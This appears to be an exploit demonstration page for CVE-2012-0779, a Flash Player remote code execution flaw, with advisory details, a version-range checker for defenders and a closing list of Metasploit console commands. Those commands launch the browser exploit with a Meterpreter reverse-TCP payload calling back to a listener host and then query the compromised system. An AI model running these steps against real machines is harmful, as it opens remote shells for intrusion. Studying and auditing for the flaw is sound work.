CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild
Public release of the vulnerability by the vendor on 2012-05-04
Details of the vulnerability provided on 2012-05-06
Metasploit PoC provided on 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
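
For defenders auditing an inventory, the useful question is whether a given Flash Player build falls inside the ranges stated above. The checker below is an added example, not part of the original post or of the Metasploit module; the version bounds come from this page, while the platform keys ("desktop", "android4", "android23"), the function names and the inventory lines are assumptions made for illustration.

```python
# Added example: classify an Adobe Flash Player build against the APSB12-09
# affected ranges quoted on this page. Not part of the Metasploit module.
from typing import Tuple

Version = Tuple[int, ...]

def parse_version(s: str) -> Version:
    """Turn '11.2.202.228' into a comparable tuple (11, 2, 202, 228)."""
    parts = s.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {s!r}")
    return tuple(int(p) for p in parts)

# Affected ranges per platform as this page states them. Each entry is
# (branch prefix, bound, inclusive): a build on that branch is affected when it
# is <= bound (inclusive, "X and earlier") or < bound ("before X").
AFFECTED_RANGES = {
    "desktop": [((10, 3), (10, 3, 183, 19), True),    # 10.3.183.19 affected
                ((11,), (11, 2, 202, 235), False)],   # 11.x before 11.2.202.235
    "android4": [((11,), (11, 1, 115, 7), True)],     # Android 4.x, 11.1.115.7 and earlier
    "android23": [((11,), (11, 1, 111, 8), True)],    # Android 3.x/2.x, 11.1.111.8 and earlier
}

def classify(version: str, platform: str = "desktop") -> str:
    """Return 'affected', 'not_affected' or 'unknown' for a build on a platform.

    'unknown' means the build sits on a branch the advisory text on this page
    does not mention (e.g. a 10.2 desktop build) and needs manual review.
    """
    v = parse_version(version)
    for branch, bound, inclusive in AFFECTED_RANGES[platform]:
        if v[:len(branch)] == branch:
            affected = v <= bound if inclusive else v < bound
            return "affected" if affected else "not_affected"
    return "unknown"

if __name__ == "__main__":
    # Constructed inventory lines (hostname, platform, version). The first is
    # the page's own test target; the others are made up for illustration.
    inventory = [
        ("xp-lab-01", "desktop", "11.2.202.228"),
        ("win7-fin-02", "desktop", "11.2.202.235"),
        ("mac-dev-03", "desktop", "10.3.183.19"),
        ("tab-android-04", "android4", "11.1.115.8"),
    ]
    for host, plat, ver in inventory:
        print(f"{host:15} {plat:9} {ver:14} {classify(ver, plat)}")
```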

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid